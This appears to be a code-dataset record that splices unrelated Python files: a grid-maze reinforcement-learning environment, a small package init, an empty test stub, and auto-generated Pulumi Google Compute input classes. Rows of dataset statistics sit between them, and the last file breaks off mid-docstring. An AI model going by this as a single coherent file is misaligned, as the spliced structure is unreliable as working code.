self.maxStuckCount = maxStuckCount
self.stuckPenaltyFactor = penaltyFactor
def disable_stuck_check(self):
self.maxStuckCount = 0
self.stuckPenaltyFactor = 1.0
def step(self, action):
"""
Override super class.
"""
act = GridMap.BlockCoorDelta(action[0], action[1])
coor, val, flagTerm, dummy = super(GME_NP_pure, self).step(act)
self.timestep += 1
state = np.array( [coor.x, coor.y], dtype=np.float32)
# state = np.array([coor.x, coor.y, self.timestep], dtype=np.float32)
# Check stuck states.
if (0 != self.maxStuckCount):
if (self.stuckState is None):
self.stuckState = state
else:
if (state[0] == self.stuckState[0] and \
state[1] == self.stuckState[1]):
self.stuckCount += 1
else:
self.stuckCount = 0
self.stuckState = None
if (self.maxStuckCount == self.stuckCount):
val = self.stuckPenaltyFactor * math.fabs(val)
flagTerm = True
if flagTerm:
self.timestep = 0
return state, val, flagTerm, dummy
def reset(self):
res = super(GME_NP_pure, self).reset()
# Clear the stuck states.
self.stuckCount = 0
self.stuckState = None
self.timestep = 0
return np.array([res.x, res.y])
# return np.array([res.x, res.y, self.timestep])
def set_trajectory(self, t):
"""
t is a numpy ndarray of shape (x, 2). t stores the position (state) history of the agent.
This function substitutes the self.agentLocs member variable with t. Converts numpy ndarray
into BlockCoor objects.
"""
n = t.shape[0]
temp = []
for i in range(n):
temp.append(self.make_a_coor(t[i, 0], t[i, 1]))
self.agentLocs = temp
self.nSteps = n
def random_map(self):
# There must be a map.
if (self.map is None):
raise GridMap.GridMapException("Map must not be None for randomizing.")
# Get the randomized indices of the staring and ending blocks.
indices = get_two_random_indices(self.map.rows, self.map.cols)
# Reset the staring block.
self.map.set_starting_block(GridMap.BlockIndex(indices[0, 0], indices[0, 1]))
# Reset the ending block.
self.map.set_ending_block(GridMap.BlockIndex(indices[1, 0], indices[1, 1]))
def log_diagnostics(self, paths):
if len(paths) > 0:
progs = [
path["observations"]
for path in paths
]
# logger.record_tabular('AverageForwardProgress', np.mean(progs))
# logger.record_tabular('MaxForwardProgress', np.max(progs))
# logger.record_tabular('MinForwardProgress', np.min(progs))
# logger.record_tabular('StdForwardProgress', np.std(progs))
else:
0
# logger.record_tabular('AverageForwardProgress', np.nan)
# logger.record_tabular('MaxForwardProgress', np.nan)
# logger.record_tabular('MinForwardProgress', np.nan)
# logger.record_tabular('StdForwardProgress', np.nan)
def terminate(self):
print("end")
class GME_NP_rew(GridMap.GridMapEnv):
def __init__(self, name="", gridMap=None, workingDir="./"):
super(GME_NP_rew, self).__init__(name, gridMap, workingDir)
# # Create map.
# self.map = GridMap.GridMap2D( 10, 20 )
# 50 x 50 maze
gm2d = GridMap.GridMap2D(50, 50, outOfBoundValue=0) # -200
gm2d.valueStartingBlock = 0 # -0.1
gm2d.valueEndingBlock = 1000
gm2d.valueNormalBlock = 0 # -0.1
gm2d.valueObstacleBlock = 0 # -10
gm2d.initialize()
# Create a starting block and an ending block.
startingBlock = GridMap.StartingBlock()
endingBlock = GridMap.EndingBlock()
# Create an obstacle block.
obstacle = GridMap.ObstacleBlock()
# Overwrite blocks.
gm2d.set_starting_block((0, 0))
gm2d.set_ending_block((49, 49), endPoint=(49.1, 49.1))
for i in range(5):
for j in range(50):
if not ((j < 15 and j >= 5) or (j < 45 and j >= 35)):
gm2d.add_obstacle((23 + i, j))
gm2d.add_obstacle((j, 23 + i))
# # 40 x 40 maze
# gm2d = GridMap.GridMap2D(40, 40, outOfBoundValue=0) # -200
# gm2d.valueStartingBlock = 0 # -0.1
# gm2d.valueEndingBlock = 1000
# gm2d.valueNormalBlock = 0 # -0.1
# gm2d.valueObstacleBlock = 0 # -10
# gm2d.initialize()
#
# # Create a starting block and an ending block.
# startingBlock = GridMap.StartingBlock()
# endingBlock = GridMap.EndingBlock()
#
# # Create an obstacle block.
# obstacle = GridMap.ObstacleBlock()
#
# # Overwrite blocks.
# gm2d.set_starting_block((0, 0))
# gm2d.set_ending_block((39, 39), endPoint=(39.1, 39.1))
# for i in range(4):
# for j in range(40):
# if not ((j < 12 and j >= 5) or (j < 35 and j >= 28)):
# gm2d.add_obstacle((18 + i, j))
# gm2d.add_obstacle((j, 18 + i))
indexEndingBlock = gm2d.get_index_ending_block()
ebGm2d = gm2d.get_block(indexEndingBlock)
print("ebGm2d.is_in_range(19.2, 9.2, 1) = {}".format(ebGm2d.is_in_range(19.2, 9.2, 1)))
self.map = gm2d
self.maxStuckCount = 0
self.stuckPenaltyFactor = 0 # -10
self.stuckCount = 0
self.stuckState = None
# Member variables for compatibility.
# self.observation_space = np.array([0, 0]) # self.observation_spac.shape should be a tuple showing the shape of the state variable.
@cached_property
def observation_space(self):
shp = (2,)
ub = BIG * np.ones(shp)
return spaces.Box(ub * -1, ub)
@cached_property
def action_space(self):
shp = (2,)
ub = 1.0 * np.ones(shp)
return spaces.Box(ub * -1, ub)
def enable_stuck_check(self, maxStuckCount, penaltyFactor):
if (maxStuckCount < 0):
raise GridMap.GridMapException("Max stuck count must be non-negative number.")
self.maxStuckCount = maxStuckCount
self.stuckPenaltyFactor = penaltyFactor
def disable_stuck_check(self):
self.maxStuckCount = 0
self.stuckPenaltyFactor = 1.0
def step(self, action):
"""
Override super class.
"""
act = GridMap.BlockCoorDelta(action[0], action[1])
coor, val, flagTerm, dummy = super(GME_NP_rew, self).step(act)
state = np.array([coor.x, coor.y], dtype=np.float32)
# Check stuck states.
if (0 != self.maxStuckCount):
if (self.stuckState is None):
self.stuckState = state
else:
if (state[0] == self.stuckState[0] and \
state[1] == self.stuckState[1]):
self.stuckCount += 1
else:
self.stuckCount = 0
self.stuckState = None
if (self.maxStuckCount == self.stuckCount):
val = self.stuckPenaltyFactor * math.fabs(val)
flagTerm = True
return state, val, flagTerm, dummy
def reset(self):
res = super(GME_NP_rew, self).reset()
# Clear the stuck states.
self.stuckCount = 0
self.stuckState = None
return np.array([res.x, res.y])
def set_trajectory(self, t):
"""
t is a numpy ndarray of shape (x, 2). t stores the position (state) history of the agent.
This function substitutes the self.agentLocs member variable with t. Converts numpy ndarray
into BlockCoor objects.
"""
n = t.shape[0]
temp = []
for i in range(n):
temp.append(self.make_a_coor(t[i, 0], t[i, 1]))
self.agentLocs = temp
self.nSteps = n
def random_map(self):
# There must be a map.
if (self.map is None):
raise GridMap.GridMapException("Map must not be None for randomizing.")
# Get the randomized indices of the staring and ending blocks.
indices = get_two_random_indices(self.map.rows, self.map.cols)
# Reset the staring block.
self.map.set_starting_block(GridMap.BlockIndex(indices[0, 0], indices[0, 1]))
# Reset the ending block.
self.map.set_ending_block(GridMap.BlockIndex(indices[1, 0], indices[1, 1]))
def log_diagnostics(self, paths):
if len(paths) > 0:
progs = [
path["observations"]
for path in paths
]
# logger.record_tabular('AverageForwardProgress', np.mean(progs))
# logger.record_tabular('MaxForwardProgress', np.max(progs))
# logger.record_tabular('MinForwardProgress', np.min(progs))
# logger.record_tabular('StdForwardProgress', np.std(progs))
else:
0
# logger.record_tabular('AverageForwardProgress', np.nan)
# logger.record_tabular('MaxForwardProgress', np.nan)
# logger.record_tabular('MinForwardProgress', np.nan)
# logger.record_tabular('StdForwardProgress', np.nan)
def terminate(self):
print("end")
| 33.031008
| 140
| 0.57154
| 1,547
| 12,783
| 4.628313
| 0.143504
| 0.011173
| 0.042458
| 0.005866
| 0.885196
| 0.877235
| 0.864665
| 0.846927
| 0.846927
| 0.843296
| 0
| 0.042151
| 0.313307
| 12,783
| 387
| 141
| 33.031008
| 0.773525
| 0.286787
| 0
| 0.736585
| 0
| 0
| 0.026212
| 0.0027
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117073
| false
| 0
| 0.034146
| 0
| 0.209756
| 0.019512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90dd9d5d8b09515f7e1a97dd9f5c78b92aa64408
| 84
|
py
|
Python
|
app/controllers/__init__.py
|
bmwant21/bmwlog
|
bfbe2718714f6ccf5cfca2204305f203aac3682a
|
[
"Unlicense"
] | 1
|
2019-09-23T06:01:14.000Z
|
2019-09-23T06:01:14.000Z
|
app/controllers/__init__.py
|
bmwant21/bmwlog
|
bfbe2718714f6ccf5cfca2204305f203aac3682a
|
[
"Unlicense"
] | 1
|
2018-06-03T16:30:16.000Z
|
2018-06-03T16:30:16.000Z
|
app/controllers/__init__.py
|
bmwant21/bmwlog
|
bfbe2718714f6ccf5cfca2204305f203aac3682a
|
[
"Unlicense"
] | null | null | null |
from .user import * # noqa
from .post import * # noqa
from .site import * # noqa
| 21
| 27
| 0.642857
| 12
| 84
| 4.5
| 0.5
| 0.555556
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 84
| 3
| 28
| 28
| 0.857143
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
293c866e5ec151594688911150c5f763a2b1e447
| 131
|
py
|
Python
|
tests/services/blockchain_follower/handlers/test_receive.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 10
|
2017-10-22T20:07:40.000Z
|
2018-08-01T21:48:49.000Z
|
tests/services/blockchain_follower/handlers/test_receive.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 81
|
2017-08-19T15:38:32.000Z
|
2020-05-12T09:56:14.000Z
|
tests/services/blockchain_follower/handlers/test_receive.py
|
dpays/dsocial-notifications
|
32b1cdcd58d622407fd50206053c5b9735a56ba9
|
[
"MIT"
] | 9
|
2017-09-19T07:12:20.000Z
|
2021-05-25T17:09:27.000Z
|
# -*- coding: utf-8 -*-
from yo.services.blockchain_follower.handlers import handle_receive
def test_handle_receive():
pass
| 16.375
| 67
| 0.740458
| 17
| 131
| 5.470588
| 0.882353
| 0.27957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008929
| 0.145038
| 131
| 7
| 68
| 18.714286
| 0.821429
| 0.160305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
295232b66c06e592382cdea44e31248757b3d675
| 772,923
|
py
|
Python
|
sdk/python/pulumi_google_native/compute/beta/_inputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/compute/beta/_inputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/compute/beta/_inputs.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'AcceleratorConfigArgs',
'AccessConfigArgs',
'AdvancedMachineFeaturesArgs',
'AliasIpRangeArgs',
'AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDiskArgs',
'AllocationSpecificSKUAllocationReservedInstancePropertiesArgs',
'AllocationSpecificSKUReservationArgs',
'AttachedDiskInitializeParamsArgs',
'AttachedDiskArgs',
'AuditConfigArgs',
'AuditLogConfigArgs',
'AuthorizationLoggingOptionsArgs',
'AutoscalingPolicyCpuUtilizationArgs',
'AutoscalingPolicyCustomMetricUtilizationArgs',
'AutoscalingPolicyLoadBalancingUtilizationArgs',
'AutoscalingPolicyScaleDownControlArgs',
'AutoscalingPolicyScaleInControlArgs',
'AutoscalingPolicyArgs',
'BackendBucketCdnPolicyBypassCacheOnRequestHeaderArgs',
'BackendBucketCdnPolicyCacheKeyPolicyArgs',
'BackendBucketCdnPolicyNegativeCachingPolicyArgs',
'BackendBucketCdnPolicyArgs',
'BackendServiceCdnPolicyBypassCacheOnRequestHeaderArgs',
'BackendServiceCdnPolicyNegativeCachingPolicyArgs',
'BackendServiceCdnPolicyArgs',
'BackendServiceConnectionTrackingPolicyArgs',
'BackendServiceFailoverPolicyArgs',
'BackendServiceIAPArgs',
'BackendServiceLogConfigArgs',
'BackendArgs',
'BindingArgs',
'CacheKeyPolicyArgs',
'CircuitBreakersArgs',
'ConditionArgs',
'ConfidentialInstanceConfigArgs',
'ConnectionDrainingArgs',
'ConsistentHashLoadBalancerSettingsHttpCookieArgs',
'ConsistentHashLoadBalancerSettingsArgs',
'CorsPolicyArgs',
'CustomerEncryptionKeyArgs',
'DeprecationStatusArgs',
'DiskInstantiationConfigArgs',
'DisplayDeviceArgs',
'DistributionPolicyZoneConfigurationArgs',
'DistributionPolicyArgs',
'DurationArgs',
'ExprArgs',
'ExternalVpnGatewayInterfaceArgs',
'FileContentBufferArgs',
'FirewallAllowedItemArgs',
'FirewallDeniedItemArgs',
'FirewallLogConfigArgs',
'FirewallPolicyAssociationArgs',
'FirewallPolicyRuleMatcherLayer4ConfigArgs',
'FirewallPolicyRuleMatcherArgs',
'FirewallPolicyRuleArgs',
'FixedOrPercentArgs',
'ForwardingRuleServiceDirectoryRegistrationArgs',
'GRPCHealthCheckArgs',
'GuestOsFeatureArgs',
'HTTP2HealthCheckArgs',
'HTTPHealthCheckArgs',
'HTTPSHealthCheckArgs',
'HealthCheckLogConfigArgs',
'HostRuleArgs',
'HttpFaultAbortArgs',
'HttpFaultDelayArgs',
'HttpFaultInjectionArgs',
'HttpFilterConfigArgs',
'HttpHeaderActionArgs',
'HttpHeaderMatchArgs',
'HttpHeaderOptionArgs',
'HttpQueryParameterMatchArgs',
'HttpRedirectActionArgs',
'HttpRetryPolicyArgs',
'HttpRouteActionArgs',
'HttpRouteRuleMatchArgs',
'HttpRouteRuleArgs',
'ImageRawDiskArgs',
'InitialStateConfigArgs',
'InstanceGroupManagerAutoHealingPolicyArgs',
'InstanceGroupManagerUpdatePolicyArgs',
'InstanceGroupManagerVersionArgs',
'InstanceParamsArgs',
'InstancePropertiesArgs',
'Int64RangeMatchArgs',
'InterconnectAttachmentPartnerMetadataArgs',
'LicenseResourceCommitmentArgs',
'LicenseResourceRequirementsArgs',
'LocalDiskArgs',
'LogConfigCloudAuditOptionsArgs',
'LogConfigCounterOptionsCustomFieldArgs',
'LogConfigCounterOptionsArgs',
'LogConfigDataAccessOptionsArgs',
'LogConfigArgs',
'MetadataFilterLabelMatchArgs',
'MetadataFilterArgs',
'MetadataItemsItemArgs',
'MetadataArgs',
'NamedPortArgs',
'NetworkEndpointGroupAppEngineArgs',
'NetworkEndpointGroupCloudFunctionArgs',
'NetworkEndpointGroupCloudRunArgs',
'NetworkEndpointGroupServerlessDeploymentArgs',
'NetworkInterfaceArgs',
'NetworkPerformanceConfigArgs',
'NetworkRoutingConfigArgs',
'NodeGroupAutoscalingPolicyArgs',
'NodeGroupMaintenanceWindowArgs',
'NodeTemplateNodeTypeFlexibilityArgs',
'NotificationEndpointGrpcSettingsArgs',
'OutlierDetectionArgs',
'PacketMirroringFilterArgs',
'PacketMirroringForwardingRuleInfoArgs',
'PacketMirroringMirroredResourceInfoInstanceInfoArgs',
'PacketMirroringMirroredResourceInfoSubnetInfoArgs',
'PacketMirroringMirroredResourceInfoArgs',
'PacketMirroringNetworkInfoArgs',
'PathMatcherArgs',
'PathRuleArgs',
'PublicDelegatedPrefixPublicDelegatedSubPrefixArgs',
'RequestMirrorPolicyArgs',
'ReservationAffinityArgs',
'ReservationArgs',
'ResourceCommitmentArgs',
'ResourcePolicyDailyCycleArgs',
'ResourcePolicyGroupPlacementPolicyArgs',
'ResourcePolicyHourlyCycleArgs',
'ResourcePolicyInstanceSchedulePolicyScheduleArgs',
'ResourcePolicyInstanceSchedulePolicyArgs',
'ResourcePolicySnapshotSchedulePolicyRetentionPolicyArgs',
'ResourcePolicySnapshotSchedulePolicyScheduleArgs',
'ResourcePolicySnapshotSchedulePolicySnapshotPropertiesArgs',
'ResourcePolicySnapshotSchedulePolicyArgs',
'ResourcePolicyWeeklyCycleDayOfWeekArgs',
'ResourcePolicyWeeklyCycleArgs',
'RolloutPolicyArgs',
'RouterAdvertisedIpRangeArgs',
'RouterBgpPeerBfdArgs',
'RouterBgpPeerArgs',
'RouterBgpArgs',
'RouterInterfaceArgs',
'RouterNatLogConfigArgs',
'RouterNatRuleActionArgs',
'RouterNatRuleArgs',
'RouterNatSubnetworkToNatArgs',
'RouterNatArgs',
'RuleArgs',
'SSLHealthCheckArgs',
'SavedDiskArgs',
'SchedulingNodeAffinityArgs',
'SchedulingArgs',
'SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigArgs',
'SecurityPolicyAdaptiveProtectionConfigArgs',
'SecurityPolicyAdvancedOptionsConfigArgs',
'SecurityPolicyAssociationArgs',
'SecurityPolicyRecaptchaOptionsConfigArgs',
'SecurityPolicyRuleHttpHeaderActionHttpHeaderOptionArgs',
'SecurityPolicyRuleHttpHeaderActionArgs',
'SecurityPolicyRuleMatcherConfigLayer4ConfigArgs',
'SecurityPolicyRuleMatcherConfigArgs',
'SecurityPolicyRuleMatcherArgs',
'SecurityPolicyRuleRateLimitOptionsThresholdArgs',
'SecurityPolicyRuleRateLimitOptionsArgs',
'SecurityPolicyRuleRedirectOptionsArgs',
'SecurityPolicyRuleArgs',
'SecuritySettingsArgs',
'ServerBindingArgs',
'ServiceAccountArgs',
'ServiceAttachmentConsumerProjectLimitArgs',
'ShareSettingsArgs',
'ShieldedInstanceConfigArgs',
'ShieldedInstanceIntegrityPolicyArgs',
'ShieldedVmConfigArgs',
'ShieldedVmIntegrityPolicyArgs',
'SourceDiskEncryptionKeyArgs',
'SourceInstanceParamsArgs',
'SslCertificateManagedSslCertificateArgs',
'SslCertificateSelfManagedSslCertificateArgs',
'StatefulPolicyPreservedStateArgs',
'StatefulPolicyArgs',
'SubnetworkLogConfigArgs',
'SubnetworkSecondaryRangeArgs',
'SubsettingArgs',
'TCPHealthCheckArgs',
'TagsArgs',
'UrlMapTestHeaderArgs',
'UrlMapTestArgs',
'UrlRewriteArgs',
'VpnGatewayVpnGatewayInterfaceArgs',
'WeightedBackendServiceArgs',
]
@pulumi.input_type
class AcceleratorConfigArgs:
def __init__(__self__, *,
accelerator_count: Optional[pulumi.Input[int]] = None,
accelerator_type: Optional[pulumi.Input[str]] = None):
"""
A specification of the type and number of accelerator cards attached to the instance.
:param pulumi.Input[int] accelerator_count: The number of the guest accelerator cards exposed to this instance.
:param pulumi.Input[str] accelerator_type: Full or partial URL of the accelerator type resource to attach to this instance. For example: projects/my-project/zones/us-central1-c/acceleratorTypes/nvidia-tesla-p100 If you are creating an instance template, specify only the accelerator name. See GPUs on Compute Engine for a full list of accelerator types.
"""
if accelerator_count is not None:
pulumi.set(__self__, "accelerator_count", accelerator_count)
if accelerator_type is not None:
pulumi.set(__self__, "accelerator_type", accelerator_type)
@property
@pulumi.getter(name="acceleratorCount")
def accelerator_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of the guest accelerator cards exposed to this instance.
"""
return pulumi.get(self, "accelerator_count")
@accelerator_count.setter
def accelerator_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "accelerator_count", value)
@property
@pulumi.getter(name="acceleratorType")
def accelerator_type(self) -> Optional[pulumi.Input[str]]:
"""
Full or partial URL of the accelerator type resource to attach to this instance. For example: projects/my-project/zones/us-central1-c/acceleratorTypes/nvidia-tesla-p100 If you are creating an instance template, specify only the accelerator name. See GPUs on Compute Engine for a full list of accelerator types.
"""
return pulumi.get(self, "accelerator_type")
@accelerator_type.setter
def accelerator_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "accelerator_type", value)
@pulumi.input_type
class AccessConfigArgs:
def __init__(__self__, *,
external_ipv6: Optional[pulumi.Input[str]] = None,
external_ipv6_prefix_length: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
nat_ip: Optional[pulumi.Input[str]] = None,
network_tier: Optional[pulumi.Input['AccessConfigNetworkTier']] = None,
public_ptr_domain_name: Optional[pulumi.Input[str]] = None,
set_public_ptr: Optional[pulumi.Input[bool]] = None,
type: Optional[pulumi.Input['AccessConfigType']] = None):
"""
An access configuration attached to an instance's network interface. Only one access config per instance is supported.
:param pulumi.Input[str] external_ipv6: The first IPv6 address of the external IPv6 range associated with this instance, prefix length is stored in externalIpv6PrefixLength in ipv6AccessConfig. The field is output only, an IPv6 address from a subnetwork associated with the instance will be allocated dynamically.
:param pulumi.Input[int] external_ipv6_prefix_length: The prefix length of the external IPv6 range.
:param pulumi.Input[str] name: The name of this access configuration. The default and recommended name is External NAT, but you can use any arbitrary string, such as My external IP or Network Access.
:param pulumi.Input[str] nat_ip: An external IP address associated with this instance. Specify an unused static external IP address available to the project or leave this field undefined to use an IP from a shared ephemeral IP address pool. If you specify a static external IP address, it must live in the same region as the zone of the instance.
:param pulumi.Input['AccessConfigNetworkTier'] network_tier: This signifies the networking tier used for configuring this access configuration and can only take the following values: PREMIUM, STANDARD. If an AccessConfig is specified without a valid external IP address, an ephemeral IP will be created with this networkTier. If an AccessConfig with a valid external IP address is specified, it must match that of the networkTier associated with the Address resource owning that IP.
:param pulumi.Input[str] public_ptr_domain_name: The DNS domain name for the public PTR record. You can set this field only if the `setPublicPtr` field is enabled in accessConfig. If this field is unspecified in ipv6AccessConfig, a default PTR record will be createc for first IP in associated external IPv6 range.
:param pulumi.Input[bool] set_public_ptr: Specifies whether a public DNS 'PTR' record should be created to map the external IP address of the instance to a DNS domain name. This field is not used in ipv6AccessConfig. A default PTR record will be created if the VM has external IPv6 range associated.
:param pulumi.Input['AccessConfigType'] type: The type of configuration. The default and only option is ONE_TO_ONE_NAT.
"""
if external_ipv6 is not None:
pulumi.set(__self__, "external_ipv6", external_ipv6)
if external_ipv6_prefix_length is not None:
pulumi.set(__self__, "external_ipv6_prefix_length", external_ipv6_prefix_length)
if name is not None:
pulumi.set(__self__, "name", name)
if nat_ip is not None:
pulumi.set(__self__, "nat_ip", nat_ip)
if network_tier is not None:
pulumi.set(__self__, "network_tier", network_tier)
if public_ptr_domain_name is not None:
pulumi.set(__self__, "public_ptr_domain_name", public_ptr_domain_name)
if set_public_ptr is not None:
pulumi.set(__self__, "set_public_ptr", set_public_ptr)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="externalIpv6")
def external_ipv6(self) -> Optional[pulumi.Input[str]]:
"""
The first IPv6 address of the external IPv6 range associated with this instance, prefix length is stored in externalIpv6PrefixLength in ipv6AccessConfig. The field is output only, an IPv6 address from a subnetwork associated with the instance will be allocated dynamically.
"""
return pulumi.get(self, "external_ipv6")
@external_ipv6.setter
def external_ipv6(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "external_ipv6", value)
@property
@pulumi.getter(name="externalIpv6PrefixLength")
def external_ipv6_prefix_length(self) -> Optional[pulumi.Input[int]]:
"""
The prefix length of the external IPv6 range.
"""
return pulumi.get(self, "external_ipv6_prefix_length")
@external_ipv6_prefix_length.setter
def external_ipv6_prefix_length(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "external_ipv6_prefix_length", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of this access configuration. The default and recommended name is External NAT, but you can use any arbitrary string, such as My external IP or Network Access.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="natIP")
def nat_ip(self) -> Optional[pulumi.Input[str]]:
"""
An external IP address associated with this instance. Specify an unused static external IP address available to the project or leave this field undefined to use an IP from a shared ephemeral IP address pool. If you specify a static external IP address, it must live in the same region as the zone of the instance.
"""
return pulumi.get(self, "nat_ip")
@nat_ip.setter
def nat_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "nat_ip", value)
@property
@pulumi.getter(name="networkTier")
def network_tier(self) -> Optional[pulumi.Input['AccessConfigNetworkTier']]:
"""
This signifies the networking tier used for configuring this access configuration and can only take the following values: PREMIUM, STANDARD. If an AccessConfig is specified without a valid external IP address, an ephemeral IP will be created with this networkTier. If an AccessConfig with a valid external IP address is specified, it must match that of the networkTier associated with the Address resource owning that IP.
"""
return pulumi.get(self, "network_tier")
@network_tier.setter
def network_tier(self, value: Optional[pulumi.Input['AccessConfigNetworkTier']]):
pulumi.set(self, "network_tier", value)
@property
@pulumi.getter(name="publicPtrDomainName")
def public_ptr_domain_name(self) -> Optional[pulumi.Input[str]]:
"""
The DNS domain name for the public PTR record. You can set this field only if the `setPublicPtr` field is enabled in accessConfig. If this field is unspecified in ipv6AccessConfig, a default PTR record will be createc for first IP in associated external IPv6 range.
"""
return pulumi.get(self, "public_ptr_domain_name")
@public_ptr_domain_name.setter
def public_ptr_domain_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_ptr_domain_name", value)
@property
@pulumi.getter(name="setPublicPtr")
def set_public_ptr(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether a public DNS 'PTR' record should be created to map the external IP address of the instance to a DNS domain name. This field is not used in ipv6AccessConfig. A default PTR record will be created if the VM has external IPv6 range associated.
"""
return pulumi.get(self, "set_public_ptr")
@set_public_ptr.setter
def set_public_ptr(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "set_public_ptr", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['AccessConfigType']]:
"""
The type of configuration. The default and only option is ONE_TO_ONE_NAT.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['AccessConfigType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class AdvancedMachineFeaturesArgs:
def __init__(__self__, *,
enable_nested_virtualization: Optional[pulumi.Input[bool]] = None,
enable_uefi_networking: Optional[pulumi.Input[bool]] = None,
threads_per_core: Optional[pulumi.Input[int]] = None):
"""
Specifies options for controlling advanced machine features. Options that would traditionally be configured in a BIOS belong here. Features that require operating system support may have corresponding entries in the GuestOsFeatures of an Image (e.g., whether or not the OS in the Image supports nested virtualization being enabled or disabled).
:param pulumi.Input[bool] enable_nested_virtualization: Whether to enable nested virtualization or not (default is false).
:param pulumi.Input[bool] enable_uefi_networking: Whether to enable UEFI networking for instance creation.
:param pulumi.Input[int] threads_per_core: The number of threads per physical core. To disable simultaneous multithreading (SMT) set this to 1. If unset, the maximum number of threads supported per core by the underlying processor is assumed.
"""
if enable_nested_virtualization is not None:
pulumi.set(__self__, "enable_nested_virtualization", enable_nested_virtualization)
if enable_uefi_networking is not None:
pulumi.set(__self__, "enable_uefi_networking", enable_uefi_networking)
if threads_per_core is not None:
pulumi.set(__self__, "threads_per_core", threads_per_core)
@property
@pulumi.getter(name="enableNestedVirtualization")
def enable_nested_virtualization(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable nested virtualization or not (default is false).
"""
return pulumi.get(self, "enable_nested_virtualization")
@enable_nested_virtualization.setter
def enable_nested_virtualization(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_nested_virtualization", value)
@property
@pulumi.getter(name="enableUefiNetworking")
def enable_uefi_networking(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable UEFI networking for instance creation.
"""
return pulumi.get(self, "enable_uefi_networking")
@enable_uefi_networking.setter
def enable_uefi_networking(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_uefi_networking", value)
@property
@pulumi.getter(name="threadsPerCore")
def threads_per_core(self) -> Optional[pulumi.Input[int]]:
"""
The number of threads per physical core. To disable simultaneous multithreading (SMT) set this to 1. If unset, the maximum number of threads supported per core by the underlying processor is assumed.
"""
return pulumi.get(self, "threads_per_core")
@threads_per_core.setter
def threads_per_core(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "threads_per_core", value)
@pulumi.input_type
class AliasIpRangeArgs:
def __init__(__self__, *,
ip_cidr_range: Optional[pulumi.Input[str]] = None,
subnetwork_range_name: Optional[pulumi.Input[str]] = None):
"""
An alias IP range attached to an instance's network interface.
:param pulumi.Input[str] ip_cidr_range: The IP alias ranges to allocate for this interface. This IP CIDR range must belong to the specified subnetwork and cannot contain IP addresses reserved by system or used by other network interfaces. This range may be a single IP address (such as 10.2.3.4), a netmask (such as /24) or a CIDR-formatted string (such as 10.1.2.0/24).
